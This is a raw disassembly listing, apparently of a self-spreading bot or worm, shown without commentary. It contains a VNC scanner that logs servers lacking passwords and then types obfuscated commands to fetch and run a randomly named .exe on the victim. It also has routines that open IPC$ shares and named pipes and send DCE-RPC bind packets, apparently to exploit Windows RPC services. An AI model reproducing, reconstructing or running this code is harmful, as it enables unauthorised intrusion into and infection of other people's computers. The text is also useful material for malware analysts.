add esp, 0Ch
test eax, eax
jnz short loc_408C74
loc_408C6D: ; CODE XREF: sub_408B99+104�j
; sub_408B99+10C�j ...
xor esi, esi
jmp loc_408D32
; ---------------------------------------------------------------------------
loc_408C74: ; CODE XREF: sub_408B99+D2�j
lea eax, [esp+3Ch+var_10]
and [esp+3Ch+arg_38], 0
push eax
lea eax, [esp+40h+var_18]
push eax
mov esi, offset aRfb03d_03d ; "RFB %03d.%03d\n"
lea eax, [esp+44h+arg_2C]
push esi
push eax
call sub_429E0E
add esp, 10h
push 3
pop eax
cmp [esp+3Ch+var_18], eax
jl short loc_408C6D
jnz short loc_408CA7
cmp [esp+3Ch+var_10], eax
jl short loc_408C6D
loc_408CA7: ; CODE XREF: sub_408B99+106�j
push 5
push eax
lea eax, [esp+44h+arg_2C]
push esi
push eax
call sub_429B03
lea eax, [esp+4Ch+arg_2C]
push 0Ch
push eax
push edi
call sub_407FE8
add esp, 1Ch
test eax, eax
jz short loc_408C6D
lea eax, [esp+3Ch+arg_28]
push 4
push eax
push edi
call sub_407FAF
add esp, 0Ch
test eax, eax
jz short loc_408C6D
mov ecx, [esp+3Ch+arg_28]
mov eax, ecx
mov edx, ecx
and eax, 0FF0000h
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, 0FF00h
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [esp+3Ch+arg_28], eax
sub eax, ebx
jz loc_409228
mov edi, dword_437190
dec eax
mov ebp, 3E8h
mov ebx, offset byte_4556C8
mov esi, offset aVxppy0owq7d ; "VxPpy0owQ7D/"
jz short loc_408D43
dec eax
jz loc_40914D
xor esi, esi
inc esi
loc_408D32: ; CODE XREF: sub_408B99+D6�j
push [esp+3Ch+var_2C]
call dword_4372D8 ; closesocket
mov eax, esi
jmp loc_40922A
; ---------------------------------------------------------------------------
loc_408D43: ; CODE XREF: sub_408B99+18D�j
push 1
push offset word_454038
push [esp+44h+var_2C]
call sub_407FE8
add esp, 0Ch
test eax, eax
jz loc_40914D
lea eax, [esp+3Ch+arg_10]
push 18h
push eax
push [esp+44h+var_2C]
call sub_407FAF
add esp, 0Ch
test eax, eax
jz loc_40914D
mov eax, [esp+3Ch+arg_10]
xor edx, edx
mov dl, byte ptr [esp+3Ch+arg_10+1]
mov ecx, 0FFh
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+3Ch+arg_10+2]
mov word ptr [esp+3Ch+arg_10], dx
xor edx, edx
mov dl, byte ptr [esp+3Ch+arg_10+3]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+3Ch+arg_18]
mov word ptr [esp+3Ch+arg_10+2], dx
xor edx, edx
mov dl, byte ptr [esp+3Ch+arg_18+1]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+3Ch+arg_18+2]
mov word ptr [esp+3Ch+arg_18], dx
xor edx, edx
mov dl, byte ptr [esp+3Ch+arg_18+3]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+3Ch+arg_1C]
mov word ptr [esp+3Ch+arg_18+2], dx
xor edx, edx
mov dl, byte ptr [esp+3Ch+arg_1C+1]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+3Ch+arg_24]
mov word ptr [esp+3Ch+arg_1C], dx
mov ecx, eax
mov edx, eax
and ecx, 0FF0000h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, 0FF00h
or edx, eax
lea eax, [esp+3Ch+arg_2878]
push eax
lea eax, [esp+40h+arg_15C]
push [esp+40h+var_10]
shr ecx, 8
push [esp+44h+var_18]
shl edx, 8
push offset aVncD_DSNopass ; "VNC%d.%d: %s - (NoPass)"
or ecx, edx
push 2710h
push eax
mov [esp+54h+arg_24], ecx
call sub_429BBE
add esp, 18h
cmp [esp+3Ch+arg_2934], 0
jz short loc_408E7D
lea eax, [esp+3Ch+arg_15C]
push eax
push offset aS_5 ; "%s"
push [esp+44h+arg_2870]
push [esp+48h+arg_2874]
call sub_41CE4A
add esp, 10h
loc_408E7D: ; CODE XREF: sub_408B99+2BF�j
push 2710h
lea eax, [esp+40h+arg_15C]
push 0
push eax
call sub_429760
lea eax, [esp+48h+var_20]
push 1
push eax
push [esp+50h+var_2C]
call sub_408029
add esp, 18h
push ebp
call edi ; dword_437190
lea eax, [esp+40h+var_20+2]
push 0
push eax
push [esp+48h+var_30]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
lea eax, [esp+44h+var_28]
push 2
push eax
push [esp+4Ch+var_34]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
lea eax, [esp+58h+arg_50]
push edx
push offset dword_4439B4
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_429B03
push 100h
push 0
push ebx
call sub_429760
add esp, 2Ch
cmp dword_456DA8, 0
jnz loc_408FF1
lea eax, [esp+48h+arg_286C]
push eax
call sub_41E4C1
test eax, eax
pop ecx
mov [esp+48h+var_34], offset dword_457CF8
jnz short loc_408F65
mov [esp+48h+var_34], offset dword_457C40
loc_408F65: ; CODE XREF: sub_408B99+3C2�j
lea eax, [esp+48h+arg_50]
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push eax
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
lea eax, [esp+6Ch+arg_50]
push eax
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
call sub_401A77
push eax
call sub_401A77
push eax
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_454A30
push [esp+94h+var_34]
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSSSS ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429BBE
add esp, 68h
jmp loc_40907D
; ---------------------------------------------------------------------------
loc_408FF1: ; CODE XREF: sub_408B99+3A4�j
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push offset dword_456BA8
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
push offset dword_456BA8
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_401AF0
push eax
push offset dword_4569A8
push offset dword_4567A8
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_4567A0
push offset dword_4565A0
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSS_0 ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429BBE
add esp, 74h
loc_40907D: ; CODE XREF: sub_408B99+453�j
and [esp+48h+var_34], 0
push ebx
call sub_4293A0
test eax, eax
pop ecx
jbe short loc_4090D2
loc_40908D: ; CODE XREF: sub_408B99+537�j
mov eax, [esp+48h+var_34]
movsx eax, byte_4556C8[eax]
push eax
push offset dword_43EE88
lea eax, [esp+50h+var_20]
push 3
push eax
call sub_429BBE
lea eax, [esp+58h+var_20]
push 0
push eax
push [esp+60h+var_38]
call sub_408029
add esp, 1Ch
push 0Fh
call edi ; dword_437190
inc [esp+4Ch+var_38]
push ebx
call sub_4293A0
cmp [esp+50h+var_38], eax
pop ecx
jb short loc_40908D
loc_4090D2: ; CODE XREF: sub_408B99+4F2�j
push ebp
call edi ; dword_437190
lea eax, [esp+50h+var_20]
push 0
push eax
push [esp+58h+var_40]
call sub_408029
add esp, 0Ch
push 7530h
call edi ; dword_437190
lea eax, [esp+54h+var_3C]
push 1
push eax
push [esp+5Ch+var_44]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
lea eax, [esp+58h+var_38]
push 0
push eax
push [esp+60h+var_48]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
lea eax, [esp+5Ch+var_44]
push 2
push eax
push [esp+64h+var_4C]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
mov eax, [esp+60h+arg_2900]
mov dword_4556C0, 1
shl eax, 6
lea eax, dword_43A380[eax]
inc dword ptr [eax]
loc_40914D: ; CODE XREF: sub_408B99+190�j
; sub_408B99+1BF�j ...
lea eax, [esp+60h+arg_28]
push 10h
push eax
push [esp+68h+var_50]
call sub_407FAF
add esp, 0Ch
test eax, eax
jnz short loc_409171
push [esp+60h+var_50]
call dword_4372D8 ; closesocket
loc_409171: ; CODE XREF: sub_408B99+5CC�j
push [esp+64h+arg_2914]
call sub_4293A0
cmp eax, 8
pop ecx
jbe short loc_40918E
mov eax, [esp+64h+arg_2914]
and byte ptr [eax+8], 0
loc_40918E: ; CODE XREF: sub_408B99+5E8�j
push [esp+64h+arg_2914]
lea eax, [esp+68h+arg_24]
push eax
call sub_407F55
lea eax, [esp+6Ch+arg_24]
push 10h
push eax
push [esp+74h+var_54]
call sub_407FE8
add esp, 14h
test eax, eax
jnz short loc_4091C6
push [esp+64h+var_54]
call dword_4372D8 ; closesocket
loc_4091C6: ; CODE XREF: sub_408B99+621�j
lea eax, [esp+68h+var_34]
push 4
push eax
push [esp+70h+var_58]
call sub_407FAF
add esp, 0Ch
test eax, eax
jnz short loc_4091E7
push [esp+68h+var_58]
call dword_4372D8 ; closesocket
loc_4091E7: ; CODE XREF: sub_408B99+642�j
mov ecx, [esp+6Ch+var_38]
mov eax, ecx
mov edx, ecx
and eax, 0FF0000h
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, 0FF00h
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [esp+6Ch+var_38], eax
sub eax, 0
jz short loc_409235
dec eax
jz short loc_409228
dec eax
jnz loc_408C6D
push 3E80h
call edi ; dword_437190
loc_409228: ; CODE XREF: sub_408B99+5E�j
; sub_408B99+BA�j ...
xor eax, eax
loc_40922A: ; CODE XREF: sub_408B99+1A5�j
; sub_408B99+AA7�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 289Ch
retn
; ---------------------------------------------------------------------------
loc_409235: ; CODE XREF: sub_408B99+67C�j
push 1
push offset word_454038
push [esp+74h+var_5C]
call sub_407FE8
add esp, 0Ch
test eax, eax
jz loc_409632
lea eax, [esp+6Ch+var_34]
push 18h
push eax
push [esp+74h+var_5C]
call sub_407FAF
add esp, 0Ch
test eax, eax
jz loc_409632
mov eax, [esp+6Ch+var_34]
xor edx, edx
mov dl, byte ptr [esp+6Ch+var_34+1]
mov ecx, 0FFh
shl eax, 8
xor dl, al
push [esp+6Ch+arg_290C]
and dx, cx
xor edx, eax
mov eax, [esp+70h+var_34+2]
mov word ptr [esp+70h+var_34], dx
xor edx, edx
mov dl, byte ptr [esp+70h+var_34+3]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+70h+var_2C]
mov word ptr [esp+70h+var_34+2], dx
xor edx, edx
mov dl, byte ptr [esp+70h+var_2C+1]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+70h+var_2C+2]
mov word ptr [esp+70h+var_2C], dx
xor edx, edx
mov dl, byte ptr [esp+70h+var_2C+3]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+70h+var_28]
mov word ptr [esp+70h+var_2C+2], dx
xor edx, edx
mov dl, byte ptr [esp+70h+var_28+1]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+70h+var_20]
mov word ptr [esp+70h+var_28], dx
mov ecx, eax
mov edx, eax
and ecx, 0FF0000h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, 0FF00h
or edx, eax
lea eax, [esp+70h+arg_2848]
push eax
lea eax, [esp+74h+arg_12C]
push [esp+74h+var_40]
shr ecx, 8
push [esp+78h+var_48]
shl edx, 8
push offset aVncD_DSS ; "VNC%d.%d: %s - %s"
or ecx, edx
push 2710h
push eax
mov [esp+88h+var_20], ecx
call sub_429BBE
add esp, 1Ch
cmp [esp+6Ch+arg_2904], 0
jz short loc_409376
lea eax, [esp+6Ch+arg_12C]
push eax
push offset aS_5 ; "%s"
push [esp+74h+arg_2840]
push [esp+78h+arg_2844]
call sub_41CE4A
add esp, 10h
loc_409376: ; CODE XREF: sub_408B99+7B8�j
push 2710h
lea eax, [esp+70h+arg_12C]
push 0
push eax
call sub_429760
lea eax, [esp+78h+var_50]
push 1
push eax
push [esp+80h+var_5C]
call sub_408029
add esp, 18h
push ebp
call edi ; dword_437190
lea eax, [esp+70h+var_50+2]
push 0
push eax
push [esp+78h+var_60]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
lea eax, [esp+74h+var_58]
push 2
push eax
push [esp+7Ch+var_64]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
lea eax, [esp+88h+arg_20]
push edx
push offset dword_4439B4
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_429B03
push 100h
push 0
push ebx
call sub_429760
add esp, 2Ch
cmp dword_456DA8, 0
jnz loc_4094EA
lea eax, [esp+78h+arg_283C]
push eax
call sub_41E4C1
test eax, eax
pop ecx
mov [esp+78h+var_64], offset dword_457CF8
jnz short loc_40945E
mov [esp+78h+var_64], offset dword_457C40
loc_40945E: ; CODE XREF: sub_408B99+8BB�j
lea eax, [esp+78h+arg_20]
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push eax
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
lea eax, [esp+9Ch+arg_20]
push eax
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
call sub_401A77
push eax
call sub_401A77
push eax
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_454A30
push [esp+0C4h+var_64]
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSSSS ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429BBE
add esp, 68h
jmp loc_409576
; ---------------------------------------------------------------------------
loc_4094EA: ; CODE XREF: sub_408B99+89D�j
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push offset dword_456BA8
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
push offset dword_456BA8
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_401AF0
push eax
push offset dword_4569A8
push offset dword_4567A8
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_4567A0
push offset dword_4565A0
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSS_0 ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429BBE
add esp, 74h
loc_409576: ; CODE XREF: sub_408B99+94C�j
push ebx
xor esi, esi
call sub_4293A0
test eax, eax
pop ecx
jbe short loc_4095BF
loc_409583: ; CODE XREF: sub_408B99+A24�j
movsx eax, byte_4556C8[esi]
push eax
push offset dword_43EE88
lea eax, [esp+80h+var_50]
push 3
push eax
call sub_429BBE
lea eax, [esp+88h+var_50]
push 0
push eax
push [esp+90h+var_68]
call sub_408029
add esp, 1Ch
push 0Fh
call edi ; dword_437190
push ebx
inc esi
call sub_4293A0
cmp esi, eax
pop ecx
jb short loc_409583
loc_4095BF: ; CODE XREF: sub_408B99+9E8�j
push ebp
call edi ; dword_437190
mov esi, [esp+80h+var_70]
lea eax, [esp+80h+var_50]
push 0
push eax
push esi
call sub_408029
add esp, 0Ch
push 7530h
call edi ; dword_437190
xor ebx, ebx
lea eax, [esp+84h+var_6C]
inc ebx
push ebx
push eax
push esi
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
lea eax, [esp+88h+var_68]
push 0
push eax
push esi
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
lea eax, [esp+8Ch+var_74]
push 2
push eax
push esi
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
mov eax, [esp+90h+arg_28D0]
mov dword_4556C0, ebx
shl eax, 6
lea eax, dword_43A380[eax]
inc dword ptr [eax]
jmp short loc_409636
; ---------------------------------------------------------------------------
loc_409632: ; CODE XREF: sub_408B99+6B1�j
; sub_408B99+6CC�j
mov esi, [esp+6Ch+var_5C]
loc_409636: ; CODE XREF: sub_408B99+A97�j
push esi
call dword_4372D8 ; closesocket
xor eax, eax
inc eax
jmp loc_40922A
sub_408B99 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cmp off_43EDE8, 0
push ebx
push esi
push edi
jz short loc_4096A2
mov ebx, offset off_43EDE8
loc_409656: ; CODE XREF: .text:004096A0�j
cmp dword_4556C0, 0
jnz short loc_4096A2
push dword ptr [ebx]
lea esi, [esp+1Ch]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push dword ptr [esp+0DCh]
rep movsd
push dword ptr [esp+0DCh]
call sub_408B99
add esp, 0D0h
test eax, eax
jnz short loc_40969A
push 3E80h
call dword_437190 ; Sleep
loc_40969A: ; CODE XREF: .text:0040968D�j
add ebx, 4
cmp dword ptr [ebx], 0
jnz short loc_409656
loc_4096A2: ; CODE XREF: .text:0040964F�j
; .text:0040965D�j
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
retn
; =============== S U B R O U T I N E =======================================
sub_4096A9 proc near ; CODE XREF: sub_4097B9+EE�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
xor edx, edx
cmp [esp+arg_4], edx
jbe short locret_4096D9
push esi
mov esi, [esp+4+arg_8]
loc_4096B6: ; CODE XREF: sub_4096A9+2D�j
mov eax, [esp+4+arg_0]
mov cl, [edx+eax]
mov al, cl
and cl, 0Fh
shr al, 4
add cl, 41h
add al, 41h
mov [esi+edx*2], cl
mov [esi+edx*2+1], al
inc edx
cmp edx, [esp+4+arg_4]
jb short loc_4096B6
pop esi
locret_4096D9: ; CODE XREF: sub_4096A9+6�j
retn
sub_4096A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4096DA proc near ; CODE XREF: sub_4096DA+CD�p
; sub_4097B9+493�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_4096EE
or [ebp+arg_7], 1
jmp short loc_4096F2
; ---------------------------------------------------------------------------
loc_4096EE: ; CODE XREF: sub_4096DA+C�j
and [ebp+arg_7], 0FEh
loc_4096F2: ; CODE XREF: sub_4096DA+12�j
mov ebx, [ebp+arg_20]
mov eax, [ebp+arg_24]
lea ecx, [ebx+18h]
cmp ecx, eax
ja short loc_409713
or [ebp+arg_7], 2
and byte ptr [ebp+arg_28+3], 0
lea eax, [ebx+18h]
mov [ebp+arg_14], ebx
mov [ebp+arg_C], ax
jmp short loc_409725
; ---------------------------------------------------------------------------
loc_409713: ; CODE XREF: sub_4096DA+23�j
mov [ebp+arg_C], ax
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_14], eax
mov byte ptr [ebp+arg_28+3], 1
loc_409725: ; CODE XREF: sub_4096DA+37�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_4297B8
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jnz short loc_40973E
loc_40973A: ; CODE XREF: sub_4096DA+A4�j
xor eax, eax
jmp short loc_4097B4
; ---------------------------------------------------------------------------
loc_40973E: ; CODE XREF: sub_4096DA+5E�j
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_429420
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call dword_437078 ; WriteFile
push [ebp+arg_20]
test eax, eax
jnz short loc_409780
call sub_4298F2
pop ecx
jmp short loc_40973A
; ---------------------------------------------------------------------------
loc_409780: ; CODE XREF: sub_4096DA+9C�j
call sub_4298F2
cmp byte ptr [ebp+arg_28+3], 0
pop ecx
jz short loc_4097B1
push 0
sub ebx, edi
push [ebp+arg_24]
add edi, esi
lea esi, [ebp+arg_4]
push ebx
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
rep movsd
call sub_4096DA
add esp, 2Ch
jmp short loc_4097B4
; ---------------------------------------------------------------------------
loc_4097B1: ; CODE XREF: sub_4096DA+B0�j
xor eax, eax
inc eax
loc_4097B4: ; CODE XREF: sub_4096DA+62�j
; sub_4096DA+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_4096DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4097B9 proc near ; CODE XREF: .text:00409D8F�p
; .text:00409DB4�p ...
var_CC48 = byte ptr -0CC48h
var_8C48 = byte ptr -8C48h
var_6C48 = byte ptr -6C48h
var_4C48 = byte ptr -4C48h
var_2C48 = word ptr -2C48h
var_10F0 = dword ptr -10F0h
var_7F4 = byte ptr -7F4h
var_7EF = byte ptr -7EFh
var_7B0 = byte ptr -7B0h
var_344 = byte ptr -344h
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_70 = byte ptr -70h
var_6C = byte ptr -6Ch
var_6B = byte ptr -6Bh
var_6A = byte ptr -6Ah
var_69 = byte ptr -69h
var_68 = dword ptr -68h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = dword ptr -60h
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = word ptr -50h
var_4E = byte ptr -4Eh
var_4C = byte ptr -4Ch
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = dword ptr -20h
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_B0 = dword ptr 0B8h
arg_B8 = dword ptr 0C0h
arg_C0 = dword ptr 0C8h
arg_C8 = dword ptr 0D0h
arg_CC = dword ptr 0D4h
push ebp
mov ebp, esp
mov eax, 0CC48h
call sub_429B60
push ebx
push esi
push edi
lea eax, [ebp+arg_4]
push 1
push eax
call sub_404525
pop ecx
cmp eax, 3
pop ecx
mov [ebp+var_4], eax
jz short loc_4097F7
lea eax, [ebp+arg_4]
push 5
push eax
call sub_404525
pop ecx
cmp eax, 3
pop ecx
mov [ebp+var_4], eax
jnz loc_409C75
loc_4097F7: ; CODE XREF: sub_4097B9+23�j
mov eax, dword_43EFB0
xor ebx, ebx
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_409C75
push 2B1h
lea eax, [ebp+var_344]
push ebx
push eax
call sub_429760
mov esi, 0DACh
lea eax, [ebp+var_10F0]
push esi
push ebx
push eax
call sub_429760
push 1B58h
lea eax, [ebp+var_2C48]
push ebx
push eax
call sub_429760
push 0DABh
lea eax, [ebp+var_10F0]
push 41h
push eax
call sub_429760
mov edi, [ebp+arg_0]
push 5
push offset dword_43EFB4
lea edi, [edi+edi*2]
shl edi, 2
mov eax, dword ptr (loc_43F012+2)[edi]
mov ecx, dword ptr (loc_43F00F+1)[edi]
mov [ebp+eax+var_10F0], ecx
lea eax, [ebp+var_7F4]
push eax
call sub_429420
push 3Fh
lea eax, [ebp+var_7EF]
push offset sub_43EFD0
push eax
call sub_429420
add esp, 48h
lea eax, [ebp+var_344]
push eax
push [ebp+var_C]
push offset dword_43A8E8
call sub_4096A9
lea eax, [ebp+var_344]
push eax
call sub_4293A0
push eax
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_7B0]
push eax
call sub_429420
lea eax, [ebp+var_344]
push eax
call sub_4293A0
add esp, 20h
cmp [ebp+var_4], 3
mov [ebp+eax+var_7B0], bl
jnz short loc_409900
xor eax, eax
loc_4098EA: ; CODE XREF: sub_4097B9+145�j
movzx cx, byte ptr [ebp+eax+var_10F0]
mov [ebp+eax*2+var_2C48], cx
inc eax
cmp eax, esi
jb short loc_4098EA
loc_409900: ; CODE XREF: sub_4097B9+12D�j
lea eax, [ebp+arg_4]
mov esi, 2000h
push eax
push offset aS_0 ; "\\\\%s"
lea eax, [ebp+var_6C48]
push esi
push eax
call sub_429BBE
lea eax, [ebp+var_6C48]
push esi
push eax
lea eax, [ebp+var_CC48]
push eax
call sub_42AA24
lea eax, [ebp+arg_4]
push offset dword_43AB8C
push eax
call sub_42A8C0
add esp, 24h
test eax, eax
jz short loc_40999C
lea eax, [ebp+arg_4]
push eax
push offset dword_43CB4C
lea eax, [ebp+var_8C48]
push esi
push eax
call sub_429BBE
push esi
lea eax, [ebp+var_8C48]
push offset aIpc ; "IPC$"
push eax
call sub_4299E0
push 20h
lea eax, [ebp+var_90]
push ebx
push eax
call sub_429760
lea eax, [ebp+var_8C48]
add esp, 28h
mov [ebp+var_7C], eax
mov eax, offset byte_454A54
push ebx
push eax
push eax
lea eax, [ebp+var_90]
push eax
call dword_457000
loc_40999C: ; CODE XREF: sub_4097B9+189�j
lea eax, [ebp+arg_4]
push eax
push offset dword_43CB4C
lea eax, [ebp+var_4C48]
push esi
push eax
call sub_429BBE
push esi
lea eax, [ebp+var_4C48]
push offset dword_43F078
push eax
call sub_4299E0
add esp, 1Ch
lea eax, [ebp+var_4C48]
push ebx
push ebx
push 3
push ebx
push 3
push 40000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_409C6A
push 48h
lea eax, [ebp+var_6C]
push ebx
push eax
call sub_429760
xor eax, eax
push 10h
inc eax
pop esi
mov [ebp+var_60], eax
mov [ebp+var_54], eax
mov [ebp+var_4E], al
mov [ebp+var_3C], eax
push esi
lea eax, [ebp+var_4C]
push offset dword_43F064
push eax
mov [ebp+var_6C], 5
mov [ebp+var_6B], bl
mov [ebp+var_6A], 0Bh
mov [ebp+var_69], 3
mov [ebp+var_68], esi
mov [ebp+var_64], 48h
mov [ebp+var_62], bx
mov [ebp+var_5C], 10B8h
mov [ebp+var_5A], 10B8h
mov [ebp+var_58], ebx
mov [ebp+var_50], bx
call sub_429420
push esi
lea eax, [ebp+var_38]
push offset dword_43E15C
push eax
mov [ebp+var_28], 2
call sub_429420
add esp, 24h
lea eax, [ebp+var_70]
push ebx
push eax
lea eax, [ebp+var_6C]
push 48h
push eax
push [ebp+var_4]
call dword_437078 ; WriteFile
test eax, eax
jnz short loc_409A87
loc_409A79: ; CODE XREF: sub_4097B9+339�j
push [ebp+var_4]
call dword_437044 ; CloseHandle
jmp loc_409C6A
; ---------------------------------------------------------------------------
loc_409A87: ; CODE XREF: sub_4097B9+2BE�j
lea eax, [ebp+var_CC48]
push eax
call sub_42AA07
lea eax, [eax+eax+12h]
pop ecx
test al, 3
mov [ebp+arg_0], eax
jz short loc_409AA8
